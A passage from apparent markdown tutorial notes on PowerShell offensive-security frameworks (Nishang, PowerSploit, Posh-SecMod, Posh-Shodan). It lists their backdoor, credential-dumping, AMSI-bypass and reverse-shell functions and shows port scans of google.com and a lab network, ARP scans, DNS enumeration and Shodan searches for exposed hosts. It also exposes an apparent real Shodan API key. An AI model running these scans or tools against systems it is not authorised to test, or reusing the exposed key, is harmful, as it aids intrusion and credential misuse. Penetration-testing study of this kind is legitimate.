Add-ScrnSaveBackdoor nishang\nFunction Base64ToString nishang\nFunction Check-VM nishang\nFunction ConvertTo-ROT13 nishang\nFunction Copy-VSS nishang\nFunction Create-MultipleSessions nishang\nFunction DNS_TXT_Pwnage nishang\nFunction Do-Exfiltration nishang\nFunction Download nishang\nFunction Download_Execute nishang\nFunction Download-Execute-PS nishang\nFunction Enable-DuplicateToken nishang\nFunction Execute-Command-MSSQL nishang\nFunction Execute-DNSTXT-Code nishang\nFunction Execute-OnTime nishang\nFunction ExetoText nishang\nFunction FireBuster nishang\nFunction FireListener nishang\nFunction Get-Information nishang\nFunction Get-LsaSecret nishang\nFunction Get-PassHashes nishang\nFunction Get-PassHints nishang\nFunction Get-Unconstrained nishang\nFunction Get-WebCredentials nishang\nFunction Get-Wlan-Keys nishang\nFunction Get-WmiShellOutput nishang\nFunction Gupt-Backdoor nishang\nFunction HTTP-Backdoor nishang\nFunction Invoke-ADSBackdoor nishang\nFunction Invoke-AmsiBypass nishang\nFunction Invoke-BruteForce nishang\nFunction Invoke-CredentialsPhish nishang\nFunction Invoke-Decode nishang\nFunction Invoke-Encode nishang\nFunction Invoke-Interceptor nishang\nFunction Invoke-JSRatRegsvr nishang\nFunction Invoke-JSRatRundll nishang\nFunction Invoke-Mimikatz nishang\nFunction Invoke-MimikatzWDigestDowngrade nishang\nFunction Invoke-Mimikittenz nishang\nFunction Invoke-NetworkRelay nishang\nFunction Invoke-PortScan nishang\nFunction Invoke-PoshRatHttp nishang\nFunction Invoke-PoshRatHttps nishang\nFunction Invoke-PowerShellIcmp nishang\nFunction Invoke-PowerShellTcp nishang\nFunction Invoke-PowerShellUdp nishang\nFunction Invoke-PowerShellWmi nishang\nFunction Invoke-Prasadhak nishang\nFunction Invoke-PSGcat nishang\nFunction Invoke-PsGcatAgent nishang\nFunction Invoke-PsUACme nishang\nFunction Invoke-SSIDExfil nishang\nFunction Out-CHM nishang\nFunction Out-DnsTxt nishang\nFunction Out-Excel nishang\nFunction Out-HTA nishang\nFunction Out-Java nishang\nFunction Out-JS nishang\nFunction Out-RundllCommand nishang\nFunction Out-SCF nishang\nFunction Out-SCT nishang\nFunction Out-Shortcut nishang\nFunction Out-WebQuery nishang\nFunction Out-Word nishang\nFunction Parse_Keys nishang\nFunction Remove-Persistence nishang\nFunction Remove-PoshRat nishang\nFunction Remove-Update nishang\nFunction Run-EXEonRemote nishang\nFunction Show-TargetScreen nishang\nFunction Speak nishang\nFunction Start-CaptureServer nishang\nFunction StringtoBase64 nishang\nFunction TexttoEXE nishang\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n- ```Port Scan```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Get-Help Invoke-PortScan -Examples\n\nNAME\n Invoke-PortScan\n\nSYNOPSIS\n Nihsang payload which Scan IP-Addresses, Ports and HostNames\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254\n\n\n\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost\n\n\n\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort\n\n\n Use above to do a port scan on default ports.\n\n\n\n\n -------------------------- EXAMPLE 4 --------------------------\n\n PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500\n\n\n\n\n\n\n\n -------------------------- EXAMPLE 5 --------------------------\n\n PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.255 -ResolveHost\n\nIPAddress HostName Ports\n--------- -------- -----\n10.0.0.1\n10.0.0.95 MACBOOKPRO-5ED1\n10.0.0.129 John-PC.pfpt.com\n10.0.0.233 WIN-2012-DC.pfpt.com\n10.0.0.254 WIN-2012-DC.pfpt.com\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\nishang-master> Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.255 -ResolveHost -ScanPort\n\nIPAddress HostName Ports\n--------- -------- -----\n10.0.0.1 {53, 80, 443}\n10.0.0.95 MACBOOKPRO-5ED1 {}\n10.0.0.129 John-PC.pfpt.com {139, 445, 3389}\n10.0.0.233 WIN-2012-DC.pfpt.com {53, 139, 389, 445...}\n10.0.0.254 WIN-2012-DC.pfpt.com {111}\n\nPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n```\n\n###### [Posh-SecMod](https://github.com/darkoperator/Posh-SecMod) - PowerShell Module with Security cmdlets for security work\n\n- Import ```Posh-SecMod```\n\n```PowerShell\nPS C:\\Users\\Administrator> cd .\\Desktop\nPS C:\\Users\\Administrator\\Desktop> cd .\\Posh-SecMod-master\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> Import-Module .\\Posh-SecMod.psd1\n```\n\n- List the ```commands``` exported by the module\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> Get-Command -Module Posh-SecMod\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Add-Zip Posh-SecMod\nFunction Compress-PostScript Posh-SecMod\nFunction Confirm-IsAdmin Posh-SecMod\nFunction Connect-DBSQLite3 Posh-SecMod\nFunction ConvertTo-InAddrARPA Posh-SecMod\nFunction ConvertTo-PostBase64Command Posh-SecMod\nFunction ConvertTo-PostFiletoHex Posh-SecMod\nFunction ConvertTo-PostHextoFile Posh-SecMod\nFunction Expand-Zip Posh-SecMod\nFunction Get-ApplicationHost Posh-SecMod\nFunction Get-AuditDSComputerAccount Posh-SecMod\nFunction Get-AuditDSDeletedAccount Posh-SecMod\nFunction Get-AuditDSDisabledUserAcount Posh-SecMod\nFunction Get-AuditDSLockedUserAcount Posh-SecMod\nFunction Get-AuditDSUserAcount Posh-SecMod\nFunction Get-AuditFileTimeStamp Posh-SecMod\nFunction Get-AuditInstallSoftware Posh-SecMod\nFunction Get-AuditLogedOnSessions Posh-SecMod\nFunction Get-AuditPrefechList Posh-SecMod\nFunction Get-AuditRegKeyLastWriteTime Posh-SecMod\nFunction Get-ComObject Posh-SecMod\nFunction Get-DBSQLite3Connection Posh-SecMod\nFunction Get-FileHash Posh-SecMod\nFunction Get-LogDateString Posh-SecMod\nFunction Get-MDNSRecords Posh-SecMod\nFunction Get-PoshSecModVersion Posh-SecMod\nFunction Get-PostCopyNTDS Posh-SecMod\nFunction Get-PostHashdumpScript Posh-SecMod\nFunction Get-PostReverTCPShell Posh-SecMod\nFunction Get-RegKeys Posh-SecMod\nFunction Get-RegKeySecurityDescriptor Posh-SecMod\nFunction Get-RegValue Posh-SecMod\nFunction Get-RegValues Posh-SecMod\nFunction Get-SystemDNSServer Posh-SecMod\nFunction Get-Webconfig Posh-SecMod\nFunction Get-WebFile Posh-SecMod\nFunction Get-Whois Posh-SecMod\nFunction Get-Zip Posh-SecMod\nFunction Get-ZipChildItems_Recurse Posh-SecMod\nFunction Import-DNSReconXML Posh-SecMod\nFunction Import-NmapXML Posh-SecMod\nFunction Invoke-ARPScan Posh-SecMod\nFunction Invoke-DBSQLite3Query Posh-SecMod\nFunction Invoke-EnumSRVRecords Posh-SecMod\nFunction Invoke-PingScan Posh-SecMod\nFunction Invoke-PortScan Posh-SecMod\nFunction Invoke-ReverseDNSLookup Posh-SecMod\nFunction New-DBSQLConnectionString Posh-SecMod\nFunction New-IPRange Posh-SecMod\nFunction New-IPv4Range Posh-SecMod\nFunction New-IPv4RangeFromCIDR Posh-SecMod\nFunction New-PostDownloadExecutePE Posh-SecMod\nFunction New-PostDownloadExecuteScript Posh-SecMod\nFunction New-RegKey Posh-SecMod\nFunction New-Zip Posh-SecMod\nFunction Remove-DBSQLite3Connection Posh-SecMod\nFunction Remove-RegKey Posh-SecMod\nFunction Remove-RegValue Posh-SecMod\nFunction Resolve-DNSRecord Posh-SecMod\nFunction Resolve-HostRecord Posh-SecMod\nFunction Set-RegValue Posh-SecMod\nFunction Start-PostRemoteProcess Posh-SecMod\nFunction Test-RegKeyAccess Posh-SecMod\nFunction Update-SysinternalsTools Posh-SecMod\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master>\n```\n\n- Host Discovery - ```ARP Scan```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> Get-Help Invoke-ARPScan -Examples\n\nNAME\n Invoke-ARPScan\n\nSYNOPSIS\n Performs an ARP scan against a given range of IPv4 IP Addresses.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Invoke an ARP Scan against a range of IPs specified in CIDR Format\n\n\n PS C:\\> Invoke-ARPScan -CIDR 172.20.10.1/24\n\n MAC Address\n --- -------\n 14:10:9F:D5:1A:BF 172.20.10.2\n 00:0C:29:93:10:B5 172.20.10.3\n 00:0C:29:93:10:B5 172.20.10.15\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> Invoke-ARPScan -CIDR 10.0.0.1/24\n\nMAC Address\n--- -------\nBC:9F:EF:69:35:19 10.0.0.19\n40:F0:2F:57:6C:13 10.0.0.53\n00:9A:CD:C9:77:54 10.0.0.61\n08:00:27:CA:01:8E 10.0.0.94\nF4:0F:24:33:5E:D1 10.0.0.95\nC8:21:58:31:F6:73 10.0.0.173\n08:00:27:7C:C3:C9 10.0.0.233\nE4:A7:A0:09:3A:12 10.0.0.234\n00:05:04:03:02:01 10.0.0.254\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master>\n```\n\n- Enumerate ```DNS SRV Records```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> Get-Help Invoke-EnumSRVRecords -Examples\n\nNAME\n Invoke-EnumSRVRecords\n\nSYNOPSIS\n Enumerates common DNS SRV Records for a given domain.\n\n -------------------------- EXAMPLE 1 --------------------------\n\n PS C:\\>Invoke-EnumSRVRecords -Domain microsoft.com\n\n\n Type : SRV\n Name : _sip._tls.microsoft.com\n Port : 443\n Priority : 0\n Target : sip.microsoft.com.\n Address : @{Name=sip.microsoft.com; Type=A; Address=65.55.30.130}\n\n Type : SRV\n Name : _sipfederationtls._tcp.microsoft.com\n Port : 5061\n Priority : 0\n Target : sipfed.microsoft.com.\n Address : @{Name=sipfed.microsoft.com; Type=A; Address=65.55.30.130}\n\n Type : SRV\n Name : _xmpp-server._tcp.microsoft.com\n Port : 5269\n Priority : 0\n Target : sipdog3.microsoft.com.\n Address : @{Name=sipdog3.microsoft.com; Type=A; Address=131.107.1.47}\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master> Invoke-EnumSRVRecords -Domain google.com\n\nType : SRV\nName : _ldap._tcp.google.com\nPort : 389\nPriority : 0\nTarget : ldap.google.com.\nAddress : @{Name=ldap.google.com; Type=A; Address=216.239.32.58}\n\nType : SRV\nName : _jabber._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt2.xmpp-server.l.google.com.\nAddress : @{Name=alt2.xmpp-server.l.google.com; Type=A; Address=173.194.219.125}\n\nType : SRV\nName : _jabber._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt1.xmpp-server.l.google.com.\nAddress : @{Name=alt1.xmpp-server.l.google.com; Type=A; Address=64.233.181.125}\n\nType : SRV\nName : _jabber._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt3.xmpp-server.l.google.com.\nAddress : @{Name=alt3.xmpp-server.l.google.com; Type=A; Address=74.125.192.125}\n\nType : SRV\nName : _jabber._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt4.xmpp-server.l.google.com.\nAddress : @{Name=alt4.xmpp-server.l.google.com; Type=A; Address=173.194.214.125}\n\nType : SRV\nName : _jabber._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : xmpp-server.l.google.com.\nAddress : @{Name=xmpp-server.l.google.com; Type=A; Address=74.125.135.125}\n\nType : SRV\nName : _xmpp-server._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : xmpp-server.l.google.com.\nAddress : @{Name=xmpp-server.l.google.com; Type=A; Address=74.125.135.125}\n\nType : SRV\nName : _xmpp-server._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt2.xmpp-server.l.google.com.\nAddress : @{Name=alt2.xmpp-server.l.google.com; Type=A; Address=173.194.219.125}\n\nType : SRV\nName : _xmpp-server._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt4.xmpp-server.l.google.com.\nAddress : @{Name=alt4.xmpp-server.l.google.com; Type=A; Address=173.194.214.125}\n\nType : SRV\nName : _xmpp-server._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt3.xmpp-server.l.google.com.\nAddress : @{Name=alt3.xmpp-server.l.google.com; Type=A; Address=74.125.192.125}\n\nType : SRV\nName : _xmpp-server._tcp.google.com\nPort : 5269\nPriority : 0\nTarget : alt1.xmpp-server.l.google.com.\nAddress : @{Name=alt1.xmpp-server.l.google.com; Type=A; Address=64.233.181.125}\n\nType : SRV\nName : _xmpp-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt1.xmpp.l.google.com.\nAddress : {@{Name=alt1.xmpp.l.google.com; Type=A; Address=64.233.181.125}, @{Name=alt1.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4001:c09::7d}}\n\nType : SRV\nName : _xmpp-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : xmpp.l.google.com.\nAddress : {@{Name=xmpp.l.google.com; Type=A; Address=74.125.135.125}, @{Name=xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400e:c01::7d}}\n\nType : SRV\nName : _xmpp-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt3.xmpp.l.google.com.\nAddress : {@{Name=alt3.xmpp.l.google.com; Type=A; Address=74.125.192.125}, @{Name=alt3.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400d:c00::7d}}\n\nType : SRV\nName : _xmpp-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt4.xmpp.l.google.com.\nAddress : {@{Name=alt4.xmpp.l.google.com; Type=A; Address=173.194.214.125}, @{Name=alt4.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400c:c0b::7d}}\n\nType : SRV\nName : _xmpp-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt2.xmpp.l.google.com.\nAddress : {@{Name=alt2.xmpp.l.google.com; Type=A; Address=173.194.219.125}, @{Name=alt2.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4002:c03::7d}}\n\nType : SRV\nName : _jabber-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : xmpp.l.google.com.\nAddress : {@{Name=xmpp.l.google.com; Type=A; Address=74.125.135.125}, @{Name=xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400e:c01::7d}}\n\nType : SRV\nName : _jabber-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt1.xmpp.l.google.com.\nAddress : {@{Name=alt1.xmpp.l.google.com; Type=A; Address=64.233.181.125}, @{Name=alt1.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4001:c09::7d}}\n\nType : SRV\nName : _jabber-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt4.xmpp.l.google.com.\nAddress : {@{Name=alt4.xmpp.l.google.com; Type=A; Address=173.194.214.125}, @{Name=alt4.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400c:c0b::7d}}\n\nType : SRV\nName : _jabber-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt2.xmpp.l.google.com.\nAddress : {@{Name=alt2.xmpp.l.google.com; Type=A; Address=173.194.219.125}, @{Name=alt2.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4002:c03::7d}}\n\nType : SRV\nName : _jabber-client._tcp.google.com\nPort : 5222\nPriority : 0\nTarget : alt3.xmpp.l.google.com.\nAddress : {@{Name=alt3.xmpp.l.google.com; Type=A; Address=74.125.192.125}, @{Name=alt3.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400d:c00::7d}}\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-SecMod-master>\n```\n\n###### [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework\n\n- Import ```PowerSploit```\n\n```PowerShell\nPS C:\\Users\\Administrator> cd .\\Desktop\\PowerSploit-master\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Import-Module .\\PowerSploit.psd1\n```\n\n- List the ```commands``` exported by the module\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-Command -Module PowerSploit\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Add-NetUser PowerSploit\nFunction Add-ObjectAcl PowerSploit\nFunction Add-Persistence PowerSploit\nFunction Add-ServiceDacl PowerSploit\nFunction Find-AVSignature PowerSploit\nFunction Find-ComputerField PowerSploit\nFunction Find-ForeignGroup PowerSploit\nFunction Find-ForeignUser PowerSploit\nFunction Find-GPOComputerAdmin PowerSploit\nFunction Find-GPOLocation PowerSploit\nFunction Find-InterestingFile PowerSploit\nFunction Find-LocalAdminAccess PowerSploit\nFunction Find-ManagedSecurityGroups PowerSploit\nFunction Find-PathDLLHijack PowerSploit\nFunction Find-ProcessDLLHijack PowerSploit\nFunction Get-ADObject PowerSploit\nFunction Get-ApplicationHost PowerSploit\nFunction Get-ComputerDetails PowerSploit\nFunction Get-ComputerProperty PowerSploit\nFunction Get-CurrentUserTokenGroupSid PowerSploit\nFunction Get-DFSshare PowerSploit\nFunction Get-DomainPolicy PowerSploit\nFunction Get-ExploitableSystem PowerSploit\nFunction Get-GPPPassword PowerSploit\nFunction Get-HttpStatus PowerSploit\nFunction Get-Keystrokes PowerSploit\nFunction Get-ModifiablePath PowerSploit\nFunction Get-ModifiableRegistryAutoRun PowerSploit\nFunction Get-ModifiableScheduledTaskFile PowerSploit\nFunction Get-ModifiableService PowerSploit\nFunction Get-ModifiableServiceFile PowerSploit\nFunction Get-NetComputer PowerSploit\nFunction Get-NetDomainTrust PowerSploit\nFunction Get-NetFileServer PowerSploit\nFunction Get-NetForestTrust PowerSploit\nFunction Get-NetGPO PowerSploit\nFunction Get-NetGPOGroup PowerSploit\nFunction Get-NetGroup PowerSploit\nFunction Get-NetGroupMember PowerSploit\nFunction Get-NetLocalGroup PowerSploit\nFunction Get-NetOU PowerSploit\nFunction Get-NetSite PowerSploit\nFunction Get-NetSubnet PowerSploit\nFunction Get-NetUser PowerSploit\nFunction Get-ObjectAcl PowerSploit\nFunction Get-PathAcl PowerSploit\nFunction Get-RegistryAlwaysInstallElevated PowerSploit\nFunction Get-RegistryAutoLogon PowerSploit\nFunction Get-SecurityPackages PowerSploit\nFunction Get-ServiceDetail PowerSploit\nFunction Get-ServiceUnquoted PowerSploit\nFunction Get-SiteListPassword PowerSploit\nFunction Get-System PowerSploit\nFunction Get-TimedScreenshot PowerSploit\nFunction Get-UnattendedInstallFile PowerSploit\nFunction Get-UserProperty PowerSploit\nFunction Get-VaultCredential PowerSploit\nFunction Get-VolumeShadowCopy PowerSploit\nFunction Get-WebConfig PowerSploit\nFunction Install-ServiceBinary PowerSploit\nFunction Install-SSP PowerSploit\nFunction Invoke-ACLScanner PowerSploit\nFunction Invoke-AllChecks PowerSploit\nFunction Invoke-CredentialInjection PowerSploit\nFunction Invoke-DllInjection PowerSploit\nFunction Invoke-EnumerateLocalAdmin PowerSploit\nFunction Invoke-EventHunter PowerSploit\nFunction Invoke-FileFinder PowerSploit\nFunction Invoke-MapDomainTrust PowerSploit\nFunction Invoke-Mimikatz PowerSploit\nFunction Invoke-NinjaCopy PowerSploit\nFunction Invoke-Portscan PowerSploit\nFunction Invoke-ProcessHunter PowerSploit\nFunction Invoke-ReflectivePEInjection PowerSploit\nFunction Invoke-ReverseDnsLookup PowerSploit\nFunction Invoke-ServiceAbuse PowerSploit\nFunction Invoke-ShareFinder PowerSploit\nFunction Invoke-Shellcode PowerSploit\nFunction Invoke-TokenManipulation PowerSploit\nFunction Invoke-UserHunter PowerSploit\nFunction Invoke-WmiCommand PowerSploit\nFunction Mount-VolumeShadowCopy PowerSploit\nFunction New-ElevatedPersistenceOption PowerSploit\nFunction New-UserPersistenceOption PowerSploit\nFunction New-VolumeShadowCopy PowerSploit\nFunction Out-CompressedDll PowerSploit\nFunction Out-EncodedCommand PowerSploit\nFunction Out-EncryptedScript PowerSploit\nFunction Out-Minidump PowerSploit\nFunction Remove-Comments PowerSploit\nFunction Remove-VolumeShadowCopy PowerSploit\nFunction Restore-ServiceBinary PowerSploit\nFunction Set-ADObject PowerSploit\nFunction Set-CriticalProcess PowerSploit\nFunction Set-MasterBootRecord PowerSploit\nFunction Set-ServiceBinPath PowerSploit\nFunction Test-ServiceDaclPermission PowerSploit\nFunction Write-HijackDll PowerSploit\nFunction Write-ServiceBinary PowerSploit\nFunction Write-UserAddMSI PowerSploit\nFilter Convert-NameToSid PowerSploit\nFilter Convert-SidToName PowerSploit\nFilter Find-UserField PowerSploit\nFilter Get-CachedRDPConnection PowerSploit\nFilter Get-LastLoggedOn PowerSploit\nFilter Get-NetDomain PowerSploit\nFilter Get-NetDomainController PowerSploit\nFilter Get-NetForest PowerSploit\nFilter Get-NetForestCatalog PowerSploit\nFilter Get-NetForestDomain PowerSploit\nFilter Get-NetLoggedon PowerSploit\nFilter Get-NetProcess PowerSploit\nFilter Get-NetRDPSession PowerSploit\nFilter Get-NetSession PowerSploit\nFilter Get-NetShare PowerSploit\nFilter Get-Proxy PowerSploit\nFilter Get-UserEvent PowerSploit\nFilter Invoke-CheckLocalAdminAccess PowerSploit\n\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n\n- ```Port Scan```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-Help Invoke-Portscan -Examples\n\nNAME\n Invoke-Portscan\n\nSYNOPSIS\n Simple portscan module\n\n PowerSploit Function: Invoke-Portscan\n Author: Rich Lundeen (http://webstersProdigy.net)\n License: BSD 3-Clause\n Required Dependencies: None\n Optional Dependencies: None\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Invoke-Portscan -Hosts \"webstersprodigy.net,google.com,microsoft.com\" -TopPorts 50\n\n\n Description\n -----------\n Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com\n\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports \"80,443,8080\"\n\n\n Description\n -----------\n Does a portscan of \"webstersprodigy.net\", and writes a greppable output file\n\n\n\n\n -------------------------- EXAMPLE 3 --------------------------\n\n C:\\PS>Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet\n\n\n Description\n -----------\n Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats\n\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Invoke-Portscan -Hosts \"google.com\"\n\nHostname : google.com\nalive : True\nopenPorts : {80, 443}\nclosedPorts : {}\nfilteredPorts : {79, 88, 2049, 8081...}\nfinishTime : 7/9/2017 6:05:12 PM\n\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> $result = Invoke-Portscan -Hosts \"google.com\"\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> $result | Select-Object -ExpandProperty FilteredPorts\n5900\n993\n995\n111\n1723\n22\n8080\n3306\n135\n53\n143\n139\n445\n110\n3389\n21\n23\n32768\n8000\n8443\n2000\n1026\n179\n6001\n81\n113\n548\n1720\n1025\n79\n88\n2049\n8081\n49153\n631\n5631\n5000\n646\n5666\n1027\n49154\n8008\n515\n2001\n49152\n1433\n26\n554\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n" }, { "path": "41-Recon-and-Scanning-Part-2.md", "content": "#### 41. Recon and Scanning Part 2\n\n###### [Posh-Shodan](https://github.com/darkoperator/Posh-Shodan)\n\n- Import [```Posh-Shodan```](http://www.powershellmagazine.com/2014/07/15/posh-shodan-module-for-the-shodan-service/)\n\n```PowerShell\nPS C:\\Users\\Administrator> cd .\\Desktop\\Posh-Shodan-master\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Import-Module .\\Posh-Shodan.psd1\n```\n\n- List the ```commands``` exported by the module\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Get-Command -Module Posh-Shodan\n\nCommandType Name ModuleName\n----------- ---- ----------\nFunction Get-ShodanAPIInfo Posh-Shodan\nFunction Get-ShodanDNSResolve Posh-Shodan\nFunction Get-ShodanDNSReverse Posh-Shodan\nFunction Get-ShodanHostService Posh-Shodan\nFunction Get-ShodanMyIP Posh-Shodan\nFunction Get-ShodanService Posh-Shodan\nFunction Measure-ShodanExploit Posh-Shodan\nFunction Measure-ShodanHost Posh-Shodan\nFunction Read-ShodanAPIKey Posh-Shodan\nFunction Search-ShodanExploit Posh-Shodan\nFunction Search-ShodanHost Posh-Shodan\nFunction Set-ShodanAPIKey Posh-Shodan\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n- List ```help``` topics for ```Shodan```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> help *shodan*\n\nName Category Module Synopsis\n---- -------- ------ --------\nGet-ShodanAPIInfo Function Posh-Shodan Get features and information for a given API Key.\nGet-ShodanDNSResolve Function Posh-Shodan Look up the IP address for the provided list of hostnames.\nGet-ShodanDNSReverse Function Posh-Shodan Look up the hostnames that have been defined for the given list of IP addresses.\nGet-ShodanHostService Function Posh-Shodan\nGet-ShodanMyIP Function Posh-Shodan Get your current IP address as seen from the Internet.\nGet-ShodanService Function Posh-Shodan\nMeasure-ShodanExploit Function Posh-Shodan Search across a variety of data sources for exploits and get summary information using Shodan.\nMeasure-ShodanHost Function Posh-Shodan Returns the total number of results that matched the query and any facet information that was requested.\nRead-ShodanAPIKey Function Posh-Shodan Read from disk the saved Shodan API Key\nSearch-ShodanExploit Function Posh-Shodan Search across a variety of data sources for exploits. using Shodan\nSearch-ShodanHost Function Posh-Shodan Search Shodan using the same query syntax as the website and use facets to get summary information for different properties.\nSet-ShodanAPIKey Function Posh-Shodan Set a default Shodan API key for use by Posh-Shodan module.\nabout_Shodan_Host_Search_Facets HelpFile Describes the search facets that can be used when performing a search for\nabout_Shodan_Host_Search_Filters HelpFile Describes the search filters that can be used when performing a search for\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n- Set the [```Shodan API Key```](https://account.shodan.io/)\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Set-ShodanAPIKey -APIKey Y2DmqAThPzLFP1b1Ubanif3YGaqsoQlx\n\ncmdlet Set-ShodanAPIKey at command pipeline position 1\nSupply values for the following parameters:\nMasterPassword: ****\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Read-ShodanAPIKey\n\ncmdlet Read-ShodanAPIKey at command pipeline position 1\nSupply values for the following parameters:\nMasterPassword: ****\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n- ```Shodan API Info```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Get-ShodanAPIInfo\n\nUnlocked_Left : 0\nTelnet : False\nPlan : oss\nHTTPS : False\nUnlocked : False\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n- ```Shodan DNS Resolution```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Get-ShodanDNSResolve -Hostname google.com\n\ngoogle.com\n----------\n216.58.194.174\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n- ```Measure all Shodan Hosts```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Measure-ShodanHost -Query \"default password\"\n\nTotal : 80630\nFacets :\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Measure-ShodanHost -Query \"RDP\"\n\nTotal : 947\nFacets :\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Measure-ShodanHost -Query \"phpmyadmin\"\n\nTotal : 36173\nFacets :\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n- List all ```Shodan 